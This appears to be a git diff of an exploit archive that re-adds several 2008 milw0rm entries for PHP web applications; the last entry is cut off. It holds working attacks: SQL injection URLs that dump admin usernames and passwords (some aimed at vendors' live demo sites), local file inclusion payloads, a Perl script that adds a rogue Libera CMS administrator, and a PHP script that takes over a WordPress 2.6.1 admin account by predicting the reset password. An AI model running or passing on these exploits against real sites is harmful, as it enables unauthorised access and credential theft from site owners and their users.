diff --git a/platforms/php/webapps/6411.txt b/platforms/php/webapps/6411.txt
index 29a195f94..69b033f10 100755
--- a/platforms/php/webapps/6411.txt
+++ b/platforms/php/webapps/6411.txt
@@ -1,48 +1,48 @@
-###########################################################
-# 
-#        ___    __ __                  __  __            
-#       /\_ \  /\ \\ \                /\ \/\ \           
-#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
-#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
-# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
-# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
-#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
-# 
-#                                 security breakd0wn!
-###########################################################
-# 
-# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities
-# Vendor: http://www.availscript.com/
-# Vulnerable Version: N/A
-# Fix: N/A
-# 
-###########################################################
-# 
-# c0ntact: sl4x.xuz[at]gmail[dot]com
-# d0rk: "muahaha"
-# stop lammo
-# 
-###########################################################
-
-######################
-  1. Information
-######################
-     With this script you can add pictures in categories create album or wallpaper website.
-
-######################
-  2. Vulnerabilities
-######################
-     SQL Injection in "pics.php" in the "sid" parameter.
-     Cross Site Scripting in "pics.php" in the "sid" parameter.
-     Cross Site Scripting in "view.php" in the "a" parameter.
-
-######################
-  3. PoC
-######################
-     http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
-     http://localhost/path/pics.php?sid=[XSS]
-     http://localhost/path/view.php?a=[XSS]
-
-###########################################################
-
-# milw0rm.com [2008-09-09]
+###########################################################
+# 
+#        ___    __ __                  __  __            
+#       /\_ \  /\ \\ \                /\ \/\ \           
+#   ____\//\ \ \ \ \\ \    __  _ __  _\ \ \ \ \  ____    
+#  /',__\ \ \ \ \ \ \\ \_ /\ \/'\\ \/'\\ \ \ \ \/\_ ,`\  
+# /\__, `\ \_\ \_\ \__ ,__\\>  <\\>   <\\ \ \_\ \/_/  /_ 
+# \/\____/ /\____\\/_/\_\_//\_/\_\\_/\_\ \ \_____\/\____\
+#  \/___/  \/____/   \/_/  \//\/_///\/_/  \/_____/\/____/
+# 
+#                                 security breakd0wn!
+###########################################################
+# 
+# Title: Availscript Photo Album (pics.php) Multiple Vulnerabilities
+# Vendor: http://www.availscript.com/
+# Vulnerable Version: N/A
+# Fix: N/A
+# 
+###########################################################
+# 
+# c0ntact: sl4x.xuz[at]gmail[dot]com
+# d0rk: "muahaha"
+# stop lammo
+# 
+###########################################################
+
+######################
+  1. Information
+######################
+     With this script you can add pictures in categories create album or wallpaper website.
+
+######################
+  2. Vulnerabilities
+######################
+     SQL Injection in "pics.php" in the "sid" parameter.
+     Cross Site Scripting in "pics.php" in the "sid" parameter.
+     Cross Site Scripting in "view.php" in the "a" parameter.
+
+######################
+  3. PoC
+######################
+     http://localhost/path/pics.php?sid=-1+union+select+database(),2,3,4,5,6,7,8,version(),10,11,12--
+     http://localhost/path/pics.php?sid=[XSS]
+     http://localhost/path/view.php?a=[XSS]
+
+###########################################################
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6412.txt b/platforms/php/webapps/6412.txt
index 98217a22b..7199bbdc8 100755
--- a/platforms/php/webapps/6412.txt
+++ b/platforms/php/webapps/6412.txt
@@ -1,14 +1,14 @@
-Availscript Classmate Script Remote SQL Injection Vulnerability
-home script : http://www.availscript.com/classmate_script.php
-By : Stack
-befor execute exploit you need to register
-exploit
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
-live demo
-username
-http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
-http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
-
-# milw0rm.com [2008-09-09]
+Availscript Classmate Script Remote SQL Injection Vulnerability
+home script : http://www.availscript.com/classmate_script.php
+By : Stack
+befor execute exploit you need to register
+exploit
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
+live demo
+username
+http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
+http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
+
+# milw0rm.com [2008-09-09]
diff --git a/platforms/php/webapps/6413.txt b/platforms/php/webapps/6413.txt
index 5773bb21b..8d41d2bce 100755
--- a/platforms/php/webapps/6413.txt
+++ b/platforms/php/webapps/6413.txt
@@ -1,31 +1,31 @@
-############################################################################################################
-[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
-[+]Discovered by SirGod
-[+]MorTal TeaM
-[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
-############################################################################################################
- 
-[+] Dork : Powered by: Zanfi Solutions
-
-[+] Local File Inclusion
-
-   PoC :
-
-    http://[target]/[Path]index.php?flag=[Local File]%00
-
-   Example :
-
-    http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
-
-
-   PoC :
- 
-    http://[target]/[Path]/index.php?inc=[Local File]%00
-
-   Example :
-
-    http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
-
-############################################################################################################
-
-# milw0rm.com [2008-09-10]
+############################################################################################################
+[+]Zanfi CMS lite / Jaw Portal free (index.php page) Multiple Local File Inclusion
+[+]Discovered by SirGod
+[+]MorTal TeaM
+[+]Greetz E.M.I.N.EM,Ras,Puscas_marin,ToxicBlood,HrN,Kemrayz,007m
+############################################################################################################
+ 
+[+] Dork : Powered by: Zanfi Solutions
+
+[+] Local File Inclusion
+
+   PoC :
+
+    http://[target]/[Path]index.php?flag=[Local File]%00
+
+   Example :
+
+    http://127.0.0.1/index.php?flag=../../../autoexec.bat%00
+
+
+   PoC :
+ 
+    http://[target]/[Path]/index.php?inc=[Local File]%00
+
+   Example :
+
+    http://127.0.0.1/index.php?inc=../../../autoexec.bat%00
+
+############################################################################################################
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6416.txt b/platforms/php/webapps/6416.txt
index 3a1cf3218..c7b2ceae5 100755
--- a/platforms/php/webapps/6416.txt
+++ b/platforms/php/webapps/6416.txt
@@ -1,59 +1,59 @@
-#!/usr/bin/perl
- # ----------------------------------------------------------
- # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit
- # Perl Exploit - Add a new admin with your credentials!
- # Author: StAkeR - StAkeR[at]hotmail[dot]it
- # ----------------------------------------------------------
- # Usage: perl http://localhost/cms StAkeR obscure
- # ----------------------------------------------------------
-
- use strict;
- use LWP::UserAgent;
-
- my ($hostname,$username,$password) = @ARGV;
- my $request  = undef;
- my $http_s   = new LWP::UserAgent or die $!;
-
- $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
- banner() unless $username and $password;
-
- $http_s->agent("Mozilla/4.5 [en] (Win95; U)");
- $http_s->timeout(1);
- $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1");           
-
- $request = $http_s->post($hostname."/admin.php?action=add_user_process",
-                         [
-                          username       => $username,
-                          password       => $password,
-                          password_again => $password,
-                          email          => 0,
-                          su             => 1,
-                          submit         => "Add+User"
-                        ]);
-        
- if($request->is_success)
- {
-   if($request->content =~ /added successfully/i)
-   {
-     print "[+] Exploit Done!\n";
-     print "[+] Added New Administrator:\n\n";
-     print "[+] Username: ${username}\n";
-     print "[+] Password: ${password}\n";
-   }
-   else
-   {
-     print "[!] Exploit Failed!\n";
-     print "[!] Site Not Vulnerable\n";
-   }
- }
-
-
- sub banner
- {
-   print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n";
-   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
-   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
-   return exit;
- }
-
-# milw0rm.com [2008-09-10]
+#!/usr/bin/perl
+ # ----------------------------------------------------------
+ # Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit
+ # Perl Exploit - Add a new admin with your credentials!
+ # Author: StAkeR - StAkeR[at]hotmail[dot]it
+ # ----------------------------------------------------------
+ # Usage: perl http://localhost/cms StAkeR obscure
+ # ----------------------------------------------------------
+
+ use strict;
+ use LWP::UserAgent;
+
+ my ($hostname,$username,$password) = @ARGV;
+ my $request  = undef;
+ my $http_s   = new LWP::UserAgent or die $!;
+
+ $hostname = ($hostname =~ /^http:\/\/(.+?)$/) ? $ARGV[0] : banner();
+ banner() unless $username and $password;
+
+ $http_s->agent("Mozilla/4.5 [en] (Win95; U)");
+ $http_s->timeout(1);
+ $http_s->default_header('Cookie' => "libera_staff_pass=' or '1=1");           
+
+ $request = $http_s->post($hostname."/admin.php?action=add_user_process",
+                         [
+                          username       => $username,
+                          password       => $password,
+                          password_again => $password,
+                          email          => 0,
+                          su             => 1,
+                          submit         => "Add+User"
+                        ]);
+        
+ if($request->is_success)
+ {
+   if($request->content =~ /added successfully/i)
+   {
+     print "[+] Exploit Done!\n";
+     print "[+] Added New Administrator:\n\n";
+     print "[+] Username: ${username}\n";
+     print "[+] Password: ${password}\n";
+   }
+   else
+   {
+     print "[!] Exploit Failed!\n";
+     print "[!] Site Not Vulnerable\n";
+   }
+ }
+
+
+ sub banner
+ {
+   print "[+] Libera CMS <= 1.2 Remote SQL Injection Exploit (add new admin)\n";
+   print "[+] Usage: perl exploit.pl [host] [username] [password]\n";
+   print "[+] Example: perl exploit.pl http://localhost/cms StAkeR obscure\n\n";
+   return exit;
+ }
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6417.txt b/platforms/php/webapps/6417.txt
index c1486f5f0..d06238e2b 100755
--- a/platforms/php/webapps/6417.txt
+++ b/platforms/php/webapps/6417.txt
@@ -1,62 +1,62 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-
-=======================================================
-++++++++++++++++++++ Script information++++++++++++++++++++++
-=======================================================
-
-
-<<->> script        : Availscript Jobs Portal Script
-
-<<->> script site : www.availscript.com             
-
-
-
-=======================================================
-++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> www.site.me/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin--
-
-
-
-=======================================================
-+++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> InjEctOr5 TeaM  :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker
-
-<<->> Best Team : Then TrYaG Te4m & there Forum
-
-<<->> My  best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero
-
-<<->> All muslims
-
-# milw0rm.com [2008-09-10]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+
+=======================================================
+++++++++++++++++++++ Script information++++++++++++++++++++++
+=======================================================
+
+
+<<->> script        : Availscript Jobs Portal Script
+
+<<->> script site : www.availscript.com             
+
+
+
+=======================================================
+++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> www.site.me/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin--
+
+
+
+=======================================================
++++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> InjEctOr5 TeaM  :: InjEctOr $ haker-b0y $ Mr.Dangers $ Eng.Silent Night $ QalbHamad $ fisher762 $ Sp1d3r_N3T $ ToTaL $ z3rO s3v3n $ RooT-Hacker
+
+<<->> Best Team : Then TrYaG Te4m & there Forum
+
+<<->> My  best old freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ br1ght-dark  $ Golden-zero
+
+<<->> All muslims
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6421.php b/platforms/php/webapps/6421.php
index 87e6b54df..d50495b76 100755
--- a/platforms/php/webapps/6421.php
+++ b/platforms/php/webapps/6421.php
@@ -1,155 +1,155 @@
-#!/usr/bin/php
-=5.2.1 you'll need to be as well, in case
-# server is <5.2.1, your php also needs to be below.
-# to make sure it works you'll need the exact same version!
-# also, mod_php works better than (f)cgi..
-# (this is a first working version - not a very reliable one)
-#
-# you should create rainbow tables to make this work in a
-# real world scenario:
-# php-5.2.0/php createtables.php > wp261_php520
-# php-5.2.1/php createtables.php > wp261_php521
-#
-#-------------------------------------------------------------
-
-	$BLOG = $_SERVER['argv'][1];
-
-	echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";
-
-	if(!$BLOG) {
-		echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
-		echo "    fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
-		exit;
-	}
-
-	$UA = "WordpressAdminTakeover";
-	$MBOX="wp".`ps|md5sum|head -c 8`;
-	$EMAIL="$MBOX@nospamfor.us";
-
-	echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
-			"[X] rainbow tables available\n" :
-			"[!] rainbow tables not found - this will be really slow\n";
-
-	set_time_limit(0);
-	ini_set("max_execution_time",0);
-	ini_set("default_socket_timeout",20);
-
-	if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) {
-		die("[!] $BLOG is no valid URL\n");
-	}
-
-	$HOST = $match[1];
-	$PATH = $match[2];
-	if(!$PATH) $PATH='/';
-
-	echo "[-] registering new admin user\n";
-	$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
-	$data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL";
-	$req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data;
-	fputs($suck, $req);
-	sleep(1);
-	fclose($suck);
-
-	echo "[-] requesting resetlink and mail to '$EMAIL'\n";
-	$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
-	$data="user_login=$EMAIL&wp-submit=Get+New+Password";	
-	$req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n";
-	fputs($suck, $req);
-
-	echo "[.] giving $BLOG some time to deliver mail..\n";
-	for($i=0;$i<8;$i++) {
-		fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n");
-		sleep(2);
-	}
-
-	echo "[-] fetching resetlink token $MBOX\n";
-	$PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");
-	if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n");
-	$MAILID=$match[1];
-
-	echo "[-] fetching resetmail $MAILID\n";
-
-	$WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");
-	if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n");
-	$KEY=$match[1];
-
-	echo "[X] found resetkey $KEY\n";
-	echo "[-] resetting password\n";
-
-	$req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n";
-	fputs($suck, $req);
-	while(!feof($suck)) {
-		#echo "D:".
-		fgets($suck);
-	}
-	fclose($suck);
-
-	echo "[-] calculating password\n";
-	$SEED=false;
-	if(file_exists('wp261_php520')) {
-		$SEED=`grep -F $KEY wp261*|cut -d : -f 1`;
-		echo "[X] got seed $SEED from rainbow table\n";
-	}
-	$PASSWORD=calcpass($KEY, $SEED);
-
-	echo "[X] all done.";
-	exit;
-
-	function calcpass($resetkey, $seed = false) {
-		mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand();
-		define('BUGGY', $a == $b);
-		echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." mode\n";
-
-		echo "[+] got key $resetkey via mail\n";
-
-		if(!$seed) $seed = getseed($resetkey);
-
-		if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
-
-		mt_srand($seed);
-		echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n";
-		$pass = wp_generate_password();
-		echo "[+] new credentials are admin:$pass\n";
-		return $pass;
-	}
-
-	function wp_generate_password($length = 12, $special_chars = true) {
-		$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
-		if ( $special_chars )
-			$chars .= '!@#$%^&*()';
-
-		$password = '';
-		for ( $i = 0; $i < $length; $i++ )
-			$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
-		return $password;
-	} 
-
-	function getseed($resetkey) {
-		echo "[-] calculating rand seed for $resetkey (this will take a looong time)";
-		$max = pow(2,(32-BUGGY));
-		for($x=0;$x<=$max;$x++) {
-			$seed = BUGGY ? ($x << 1) + 1 : $x;
-			mt_srand($seed);
-			$testkey = wp_generate_password(20,false);
-			if($testkey==$resetkey) { echo "o\n"; return $seed; }
-
-			if(!($x % 10000)) echo ".";
-		}
-		echo "\n";
-		return false;
-	}
-
-?>
-
-# milw0rm.com [2008-09-10]
+#!/usr/bin/php
+=5.2.1 you'll need to be as well, in case
+# server is <5.2.1, your php also needs to be below.
+# to make sure it works you'll need the exact same version!
+# also, mod_php works better than (f)cgi..
+# (this is a first working version - not a very reliable one)
+#
+# you should create rainbow tables to make this work in a
+# real world scenario:
+# php-5.2.0/php createtables.php > wp261_php520
+# php-5.2.1/php createtables.php > wp261_php521
+#
+#-------------------------------------------------------------
+
+	$BLOG = $_SERVER['argv'][1];
+
+	echo "[+] w0rdpress 2.6.1. admin takeover, iso 0808\n";
+
+	if(!$BLOG) {
+		echo "[!] Usage: ".$_SERVER['argv'][0]." blogurl\n";
+		echo "    fe: ".$_SERVER['argv'][0]." http://31337.biz/blog\n";
+		exit;
+	}
+
+	$UA = "WordpressAdminTakeover";
+	$MBOX="wp".`ps|md5sum|head -c 8`;
+	$EMAIL="$MBOX@nospamfor.us";
+
+	echo (file_exists('wp261_php520') && file_exists('wp261_php521')) ?
+			"[X] rainbow tables available\n" :
+			"[!] rainbow tables not found - this will be really slow\n";
+
+	set_time_limit(0);
+	ini_set("max_execution_time",0);
+	ini_set("default_socket_timeout",20);
+
+	if(!preg_match('!http://([^/]+)(.*)$!', $BLOG, $match)) {
+		die("[!] $BLOG is no valid URL\n");
+	}
+
+	$HOST = $match[1];
+	$PATH = $match[2];
+	if(!$PATH) $PATH='/';
+
+	echo "[-] registering new admin user\n";
+	$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
+	$data = "user_login=admin".str_repeat("%20",60)."x&user_email=$EMAIL";
+	$req = "POST $PATH/wp-login.php?action=register HTTP/1.1\r\nHost: $HOST\r\nUser-Agent: $UA\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data;
+	fputs($suck, $req);
+	sleep(1);
+	fclose($suck);
+
+	echo "[-] requesting resetlink and mail to '$EMAIL'\n";
+	$suck = fsockopen($HOST, 80) or die("[!] could not connect to $HOST:80\n");
+	$data="user_login=$EMAIL&wp-submit=Get+New+Password";	
+	$req = "POST $PATH/wp-login.php?action=lostpassword HTTP/1.1\r\nHost: $HOST\r\nReferer: $BLOG/wp-login.php?action=lostpassword\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data."\r\n";
+	fputs($suck, $req);
+
+	echo "[.] giving $BLOG some time to deliver mail..\n";
+	for($i=0;$i<8;$i++) {
+		fputs($suck,"GET / HTTP/1.1\r\nHost: $HOST\r\nConnection: keep-alive\r\nKeep-Alive: 300\r\n\r\n");
+		sleep(2);
+	}
+
+	echo "[-] fetching resetlink token $MBOX\n";
+	$PAGE = file_get_contents("http://www.nospamfor.us/mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");
+	if(!preg_match('/.+mailid=(\d+).+?Reset/s', $PAGE, $match)) die("[!] failed to find resetmail try raising the wait-time right above\n");
+	$MAILID=$match[1];
+
+	echo "[-] fetching resetmail $MAILID\n";
+
+	$WHOLEMAIL=file_get_contents("http://www.nospamfor.us/mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");
+	if(!preg_match('/key=([A-z0-9]+)/', $WHOLEMAIL, $match)) die("[!] could not find resetkey in $WHOLEMAIL\n");
+	$KEY=$match[1];
+
+	echo "[X] found resetkey $KEY\n";
+	echo "[-] resetting password\n";
+
+	$req = "GET $PATH/wp-login.php?action=rp&key=$KEY HTTP/1.1\r\nHost: $HOST\r\nUser-Agent:$UA\r\nConnection: close\r\n\r\n";
+	fputs($suck, $req);
+	while(!feof($suck)) {
+		#echo "D:".
+		fgets($suck);
+	}
+	fclose($suck);
+
+	echo "[-] calculating password\n";
+	$SEED=false;
+	if(file_exists('wp261_php520')) {
+		$SEED=`grep -F $KEY wp261*|cut -d : -f 1`;
+		echo "[X] got seed $SEED from rainbow table\n";
+	}
+	$PASSWORD=calcpass($KEY, $SEED);
+
+	echo "[X] all done.";
+	exit;
+
+	function calcpass($resetkey, $seed = false) {
+		mt_srand(2); $a = mt_rand(); mt_srand(3); $b = mt_rand();
+		define('BUGGY', $a == $b);
+		echo "[-] wpress password computation. runnig in ".(BUGGY?'fast':'slow')." mode\n";
+
+		echo "[+] got key $resetkey via mail\n";
+
+		if(!$seed) $seed = getseed($resetkey);
+
+		if($seed===false) die("[!] seed not found :( try using identical php version (< 5.2.5)\n");
+
+		mt_srand($seed);
+		echo "[-] seed for key ".wp_generate_password(20,false)." is $seed\n";
+		$pass = wp_generate_password();
+		echo "[+] new credentials are admin:$pass\n";
+		return $pass;
+	}
+
+	function wp_generate_password($length = 12, $special_chars = true) {
+		$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
+		if ( $special_chars )
+			$chars .= '!@#$%^&*()';
+
+		$password = '';
+		for ( $i = 0; $i < $length; $i++ )
+			$password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
+		return $password;
+	} 
+
+	function getseed($resetkey) {
+		echo "[-] calculating rand seed for $resetkey (this will take a looong time)";
+		$max = pow(2,(32-BUGGY));
+		for($x=0;$x<=$max;$x++) {
+			$seed = BUGGY ? ($x << 1) + 1 : $x;
+			mt_srand($seed);
+			$testkey = wp_generate_password(20,false);
+			if($testkey==$resetkey) { echo "o\n"; return $seed; }
+
+			if(!($x % 10000)) echo ".";
+		}
+		echo "\n";
+		return false;
+	}
+
+?>
+
+# milw0rm.com [2008-09-10]
diff --git a/platforms/php/webapps/6422.txt b/platforms/php/webapps/6422.txt
index 38783f88a..1ae9270e3 100755
--- a/platforms/php/webapps/6422.txt
+++ b/platforms/php/webapps/6422.txt
@@ -1,62 +1,62 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
-#
-# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
-# Vulnerable Version: 1.1
-# 
-###########################################################
-#
-# d0rk:Powered By Vastal I-Tech's phpVID. 
-# 
-# 
-###########################################################
- 
-     Vulnerabilities
-
-     Blind SQL Injection in "groups.php" in the "cat" parameter.
-     Cross Site Scripting in "search_results.php"
-  
-     
-     POC:  
-	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
-	http://www.site.com/search_results.php?query=[XSS] 
-
-     
-     Live Demo: 
-	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
-	http://www.phpvid.com/search_results.php?query=
-
-
-###########################################################
-#
-#  Bug discovered : 10 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-10]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
